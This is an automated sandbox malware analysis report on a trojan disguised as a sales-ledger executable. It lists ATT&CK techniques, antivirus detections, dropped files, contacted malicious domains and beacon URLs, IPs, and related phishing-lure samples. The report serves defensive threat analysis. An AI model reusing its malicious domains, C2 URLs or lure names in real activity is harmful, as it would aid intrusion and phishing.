                  Mitre Att&ck Matrix

                  Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
                  Valid Accounts | Native API 1 | Application Shimming 1 | Exploitation for Privilege Escalation 1 | Disable or Modify Tools 11 | OS Credential Dumping 1 | File and Directory Discovery 2 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Ingress Tool Transfer 2 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
                  Default Accounts | Shared Modules 1 | Windows Service 1 | Application Shimming 1 | Deobfuscate/Decode Files or Information 1 | Credential API Hooking 1 | System Information Discovery 114 | Remote Desktop Protocol | Data from Local System 1 | Exfiltration Over Bluetooth | Encrypted Channel 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
                  Domain Accounts | Service Execution 2 | Logon Script (Windows) | Access Token Manipulation 1 | Obfuscated Files or Information 4 | Security Account Manager | Query Registry 1 | SMB/Windows Admin Shares | Email Collection 1 | Automated Exfiltration | Non-Application Layer Protocol 3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
                  Local Accounts | At (Windows) | Logon Script (Mac) | Windows Service 1 | Software Packing 13 | NTDS | Security Software Discovery 331 | Distributed Component Object Model | Credential API Hooking 1 | Scheduled Transfer | Application Layer Protocol 113 | SIM Card Swap | | Carrier Billing Fraud
                  Cloud Accounts | Cron | Network Logon Script | Process Injection 512 | Rootkit 1 | LSA Secrets | Virtualization/Sandbox Evasion 41 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
                  Replication Through Removable Media | Launchd | Rc.common | Rc.common | Masquerading 1 | Cached Domain Credentials | Process Discovery 3 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
                  External Remote Services | Scheduled Task | Startup Items | Startup Items | Virtualization/Sandbox Evasion 41 | DCSync | Application Window Discovery 1 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
                  Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Access Token Manipulation 1 | Proc Filesystem | Remote System Discovery 1 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
                  Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Process Injection 512 | /etc/passwd and /etc/shadow | System Network Connections Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction

                  Behavior Graph

                  [Behavior graph image not reproduced. Behavior Graph ID: 385451; Sample: Require your Sales Ledger f...; Startdate: 12/04/2021; Architecture: WINDOWS; Score: 100]

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  Source | Detection | Scanner | Label
                  Require your Sales Ledger from 01-April-2020.exe | 29% | ReversingLabs | ByteCode-MSIL.Trojan.Wacatac
                  Require your Sales Ledger from 01-April-2020.exe | 100% | Joe Sandbox ML |

                  Dropped Files

                  Source | Detection | Scanner | Label
                  C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe | 100% | Joe Sandbox ML |
                  C:\Users\user\AppData\Local\Temp\AdvancedRun.exe | 3% | Metadefender |
                  C:\Users\user\AppData\Local\Temp\AdvancedRun.exe | 0% | ReversingLabs |
                  C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe | 29% | ReversingLabs | ByteCode-MSIL.Trojan.Wacatac

                  Unpacked PE Files

                  Source | Detection | Scanner | Label
                  24.2.Require your Sales Ledger from 01-April-2020.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

                  Domains

                  No Antivirus matches

                  URLs

                  http://james.newtonking.com/projects/json0%URL Reputationsafe
                  http://www.carterandcone.coml0%URL Reputationsafe
                  http://www.carterandcone.coml0%URL Reputationsafe
                  http://www.carterandcone.coml0%URL Reputationsafe
                  http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t0%URL Reputationsafe
                  http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t0%URL Reputationsafe
                  http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t0%URL Reputationsafe
                  http://www.jiyu-kobo.co.jp/Y0ftYi0%Avira URL Cloudsafe
                  http://www.founder.com.cn/cn0%URL Reputationsafe
                  http://www.founder.com.cn/cn0%URL Reputationsafe
                  http://www.founder.com.cn/cn0%URL Reputationsafe
                  http://www.jiyu-kobo.co.jp/q0%Avira URL Cloudsafe
                  http://www.jiyu-kobo.co.jp/Yi0%Avira URL Cloudsafe
                  http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#0%URL Reputationsafe

                  Domains and IPs

                  Contacted Domains

| Name | IP | Active | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|---|
| www.soretyje.com | 81.17.18.194 | true | false | | unknown |
| www.seniorlivingcaelderly.com | 185.53.179.90 | true | true | | unknown |

                      Contacted URLs

| Name | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|
| http://www.seniorlivingcaelderly.com/suod/ | true | Avira URL Cloud: safe | unknown |
| http://www.seniorlivingcaelderly.com/suod/?RL0=uVgD4bu0-2R4Or&Sxo=LsHPYRuctkoWulzKyGbvgGfg2m0Ehvoa2gaw5h/iu275rsWI7O6TvqToE0BPOi46d4K3 | true | Avira URL Cloud: safe | unknown |
| www.consultoramulticars.com/suod/ | true | Avira URL Cloud: safe | low |

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://www.jiyu-kobo.co.jp/s20Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.242943283.0000000005863000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://www.fontbureau.com/designersGRequire your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmpfalse
                        high
                        http://www.msn.com/?ocid=iehpLMEMcmmon32.exe, 00000020.00000003.390011367.00000000030E2000.00000004.00000001.sdmpfalse
                          high
                          http://www.fontbureau.com/designers/?Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmpfalse
                            high
                            http://www.founder.com.cn/cn/bTheRequire your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            unknown
                            http://ocsp.sectigo.com0Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.310610016.0000000003C09000.00000004.00000001.sdmp, AdvancedRun.exe.0.drfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            unknown
                            http://www.msn.com/de-ch/?ocid=iehpLMEMhcmmon32.exe, 00000020.00000003.390011367.00000000030E2000.00000004.00000001.sdmpfalse
                              high
                              http://www.fontbureau.com/designers?Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmpfalse
                                high
                                http://www.tiro.comexplorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                http://www.fontbureau.com/designersexplorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmpfalse
                                  high
                                  http://www.jiyu-kobo.co.jp/PiRequire your Sales Ledger from 01-April-2020.exe, 00000000.00000003.243339733.000000000586B000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.goodfont.co.krRequire your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.310610016.0000000003C09000.00000004.00000001.sdmp, AdvancedRun.exe.0.drfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  http://www.msn.com/ocid=iehpcmmon32.exe, 00000020.00000003.390011367.00000000030E2000.00000004.00000001.sdmpfalse
                                    high
                                    http://www.fontbureau.coml1Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.312826232.000000000586A000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    unknown
                                    http://www.jiyu-kobo.co.jp/-czRequire your Sales Ledger from 01-April-2020.exe, 00000000.00000003.243339733.000000000586B000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    unknown
                                    http://www.sajatypeworks.comRequire your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    unknown
                                    http://www.typography.netDRequire your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    unknown
                                    http://www.founder.com.cn/cn/cTheRequire your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    unknown
                                    http://www.galapagosdesign.com/staff/dennis.htmRequire your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    unknown
                                    http://fontfabrik.comRequire your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    unknown
                                    http://www.jiyu-kobo.co.jp/Y0eRequire your Sales Ledger from 01-April-2020.exe, 00000000.00000003.243557863.000000000586A000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.msn.com/?ocid=iehpcmmon32.exe, 00000020.00000003.390011367.00000000030E2000.00000004.00000001.sdmp, cmmon32.exe, 00000020.00000003.386291684.00000000030DF000.00000004.00000001.sdmpfalse
                                      high
                                      https://sectigo.com/CPS0CRequire your Sales Ledger from 01-April-2020.exe, 00000000.00000003.310610016.0000000003C09000.00000004.00000001.sdmp, AdvancedRun.exe.0.drfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      unknown
                                      https://sectigo.com/CPS0DRequire your Sales Ledger from 01-April-2020.exe, 00000000.00000003.310610016.0000000003C09000.00000004.00000001.sdmp, AdvancedRun.exe.0.drfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      unknown
                                      http://www.galapagosdesign.com/DPleaseRequire your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      unknown
                                      http://www.fonts.comRequire your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmpfalse
                                        high
                                        http://www.sandoll.co.krRequire your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        unknown
                                        http://www.urwpp.deDPleaseRequire your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        unknown
                                        http://www.nirsoft.net/AdvancedRun.exe, AdvancedRun.exe, 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000015.00000000.299126160.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe.0.drfalse
                                          high
                                          http://www.zhongyicts.com.cnRequire your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          unknown
                                          http://www.jiyu-kobo.co.jp/jp/5iRequire your Sales Ledger from 01-April-2020.exe, 00000000.00000003.243201190.000000000586B000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRequire your Sales Ledger from 01-April-2020.exe, 00000000.00000002.314738221.0000000002951000.00000004.00000001.sdmpfalse
                                            high
                                            http://www.sakkal.comRequire your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            http://www.msn.com/de-ch/ocid=iehpcmmon32.exe, 00000020.00000003.390011367.00000000030E2000.00000004.00000001.sdmpfalse
                                              high
                                              http://www.msn.com/de-ch/?ocid=iehp.cmmon32.exe, 00000020.00000003.386291684.00000000030DF000.00000004.00000001.sdmpfalse
                                                high
                                                http://www.msn.com/de-ch/?ocid=iehpjcmmon32.exe, 00000020.00000003.386291684.00000000030DF000.00000004.00000001.sdmpfalse
                                                  high
                                                  http://www.apache.org/licenses/LICENSE-2.0Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmpfalse
                                                    high
                                                    http://www.fontbureau.comRequire your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmpfalse
                                                      high
                                                      http://www.jiyu-kobo.co.jp/-cztiRequire your Sales Ledger from 01-April-2020.exe, 00000000.00000003.243201190.000000000586B000.00000004.00000001.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.msn.com/?ocid=iehpccmmon32.exe, 00000020.00000003.386291684.00000000030DF000.00000004.00000001.sdmpfalse
                                                        high
                                                        http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000016.00000003.393538645.0000000007FF4000.00000004.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://www.jiyu-kobo.co.jp/d.Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.243557863.000000000586A000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.seniorlivingcaelderly.comexplorer.exe, 00000019.00000002.497484764.00000000061E3000.00000040.00000001.sdmp, cmmon32.exe, 00000020.00000002.484792584.0000000005349000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000016.00000003.393538645.0000000007FF4000.00000004.00000001.sdmpfalse
                                                          high
                                                          http://www.galapagosdesign.com/staff/dennis.htmcPRequire your Sales Ledger from 01-April-2020.exe, 00000000.00000003.312826232.000000000586A000.00000004.00000001.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://go.micropowershell.exe, 00000016.00000003.399833270.0000000005A8D000.00000004.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://www.jiyu-kobo.co.jp/jp/fiRequire your Sales Ledger from 01-April-2020.exe, 00000000.00000003.243201190.000000000586B000.00000004.00000001.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://www.jiyu-kobo.co.jp/Bi)Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.243201190.000000000586B000.00000004.00000001.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://www.founder.com.cn/cntoRequire your Sales Ledger from 01-April-2020.exe, 00000000.00000003.241708507.0000000005871000.00000004.00000001.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://www.jiyu-kobo.co.jp/jp/qRequire your Sales Ledger from 01-April-2020.exe, 00000000.00000003.242943283.0000000005863000.00000004.00000001.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0sRequire your Sales Ledger from 01-April-2020.exe, 00000000.00000003.310610016.0000000003C09000.00000004.00000001.sdmp, AdvancedRun.exe.0.drfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://www.jiyu-kobo.co.jp/jp/Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.243201190.000000000586B000.00000004.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://github.com/Pester/Pesterpowershell.exe, 00000016.00000003.393538645.0000000007FF4000.00000004.00000001.sdmpfalse
                                                            high
                                                            http://james.newtonking.com/projects/jsonRequire your Sales Ledger from 01-April-2020.exe, 00000000.00000002.324077435.0000000007520000.00000004.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://www.newtonsoft.com/jsonschemaRequire your Sales Ledger from 01-April-2020.exe, 00000000.00000002.324077435.0000000007520000.00000004.00000001.sdmpfalse
                                                              high
                                                              http://www.carterandcone.comlRequire your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              http://www.msn.com/de-ch/?ocid=iehpcmmon32.exe, 00000020.00000003.390011367.00000000030E2000.00000004.00000001.sdmp, cmmon32.exe, 00000020.00000003.390090022.00000000030FD000.00000004.00000001.sdmpfalse
                                                                high
                                                                http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0tRequire your Sales Ledger from 01-April-2020.exe, 00000000.00000003.310610016.0000000003C09000.00000004.00000001.sdmp, AdvancedRun.exe.0.drfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://www.fontbureau.com/designers/cabarga.htmlNRequire your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmpfalse
                                                                  high
                                                                  http://www.jiyu-kobo.co.jp/Y0ftYiRequire your Sales Ledger from 01-April-2020.exe, 00000000.00000003.243201190.000000000586B000.00000004.00000001.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  http://www.founder.com.cn/cnRequire your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  http://www.fontbureau.com/designers/frere-jones.htmlRequire your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmpfalse
                                                                    high
                                                                    http://www.jiyu-kobo.co.jp/qRequire your Sales Ledger from 01-April-2020.exe, 00000000.00000003.243201190.000000000586B000.00000004.00000001.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    http://www.jiyu-kobo.co.jp/YiRequire your Sales Ledger from 01-April-2020.exe, 00000000.00000003.243339733.000000000586B000.00000004.00000001.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.310610016.0000000003C09000.00000004.00000001.sdmp, AdvancedRun.exe.0.drfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    http://www.fontbureau.comtiRequire your Sales Ledger from 01-April-2020.exe, 00000000.00000003.312826232.000000000586A000.00000004.00000001.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    http://www.jiyu-kobo.co.jp/Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.243201190.000000000586B000.00000004.00000001.sdmp, Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.243339733.000000000586B000.00000004.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    http://www.fontbureau.com/designers8Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmpfalse
                                                                      high
                                                                      http://www.jiyu-kobo.co.jp/fiRequire your Sales Ledger from 01-April-2020.exe, 00000000.00000003.243339733.000000000586B000.00000004.00000001.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      http://www.jiyu-kobo.co.jp/jp/PiRequire your Sales Ledger from 01-April-2020.exe, 00000000.00000003.243557863.000000000586A000.00000004.00000001.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      http://www.jiyu-kobo.co.jp/(i | Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.243201190.000000000586B000.00000004.00000001.sdmp | false
                                                                      • Avira URL Cloud: safe
                                                                      unknown

                                                                      Contacted IPs


                                                                      Public

IP | Domain | Country | ASN | ASN Name | Malicious
185.53.179.90 | www.seniorlivingcaelderly.com | Germany | 61969 | TEAMINTERNET-ASDE | true

                                                                      General Information

                                                                      Joe Sandbox Version:31.0.0 Emerald
                                                                      Analysis ID:385451
                                                                      Start date:12.04.2021
                                                                      Start time:14:38:30
                                                                      Joe Sandbox Product:CloudBasic
                                                                      Overall analysis duration:0h 12m 39s
                                                                      Hypervisor based Inspection enabled:false
                                                                      Report type:full
                                                                      Sample file name:Require your Sales Ledger from 01-April-2020.exe
                                                                      Cookbook file name:default.jbs
                                                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                      Number of analysed new started processes analysed:39
                                                                      Number of new started drivers analysed:0
                                                                      Number of existing processes analysed:0
                                                                      Number of existing drivers analysed:0
                                                                      Number of injected processes analysed:1
                                                                      Technologies:
                                                                      • HCA enabled
                                                                      • EGA enabled
                                                                      • HDC enabled
                                                                      • AMSI enabled
                                                                      Analysis Mode:default
                                                                      Analysis stop reason:Timeout
                                                                      Detection:MAL
                                                                      Classification:mal100.troj.spyw.evad.winEXE@18/14@2/1
                                                                      EGA Information:Failed
                                                                      HDC Information:
                                                                      • Successful, ratio: 14.2% (good quality ratio 13.2%)
                                                                      • Quality average: 78.2%
                                                                      • Quality standard deviation: 28.7%
                                                                      HCA Information:
                                                                      • Successful, ratio: 93%
                                                                      • Number of executed functions: 150
                                                                      • Number of non-executed functions: 327
                                                                      Cookbook Comments:
                                                                      • Adjust boot time
                                                                      • Enable AMSI
                                                                      • Found application associated with file extension: .exe
                                                                      Warnings:
                                                                      • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, UsoClient.exe, wuapihost.exe
                                                                      • Excluded IPs from analysis (whitelisted): 20.82.210.154, 13.88.21.125, 92.122.145.220, 184.30.24.56, 20.50.102.62, 104.43.139.144, 2.20.142.210, 2.20.142.209, 92.122.213.247, 92.122.213.194, 52.155.217.156, 20.54.26.129, 52.147.198.201, 52.255.188.83, 13.64.90.137
                                                                      • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, consumerrp-displaycatalog-aks2eap.md.mp.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, a767.dscg3.akamai.net, ris.api.iris.microsoft.com, skypedataprdcoleus16.cloudapp.net, skypedataprdcoleus17.cloudapp.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                      • VT rate limit hit for: /opt/package/joesandbox/database/analysis/385451/sample/Require your Sales Ledger from 01-April-2020.exe

                                                                      Simulations

                                                                      Behavior and APIs

Time | Type | Description
14:40:37 | API Interceptor | 17x Sleep call for process: powershell.exe modified

                                                                      Joe Sandbox View / Context

                                                                      IPs

                                                                      No context

                                                                      Domains

                                                                      No context

                                                                      ASN

Match: TEAMINTERNET-ASDE

Associated Sample Name / URL | Detection | Context
52FFDD3BC0DE63EB8F6CD8A90373EAF3BCC37BB0804FC.exe | malicious | 185.53.177.71
PO#560.zip.exe | malicious | 185.53.177.14
safecrypt.exe | malicious | 185.53.178.54
RFQ HAN4323.exe | malicious | 185.53.177.11
Doc.exe | malicious | 185.53.178.14
payment slip_pdf.exe | malicious | 185.53.177.10
iQnbU4o7yx.exe | malicious | 185.53.179.28
requisition from ASTRO EXPRESS.xlsx | malicious | 185.53.177.10
inquiry 19117030P.xlsx | malicious | 185.53.177.14
HwL7D1UcZG.exe | malicious | 185.53.177.13
CREDIT NOTE DEBIT NOTE 30.1.2021.xlsx | malicious | 185.53.177.13
CiL08gVVjl.exe | malicious | 185.53.177.13
Mv Maersk Kleven V949E.xlsx | malicious | 185.53.177.13
Inquiry PR11020204168.xlsx | malicious | 185.53.177.13
PO210119.exe.exe | malicious | 185.53.178.53
payment advice002436_pdf.exe | malicious | 185.53.177.10
PDRgIfT71e.exe | malicious | 185.53.177.13
Payment Advice.xlsx | malicious | 185.53.177.13
payment advice00000789_pdf.exe | malicious | 185.53.177.10
Q52msELKeI.exe | malicious | 185.53.178.13

                                                                      JA3 Fingerprints

                                                                      No context

                                                                      Dropped Files

Match: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe

Associated Sample Name / URL | Detection
Account Confirmation.exe | malicious
Download Report.08.04.2021.pdf.exe | malicious
ORDER-02188.exe | malicious
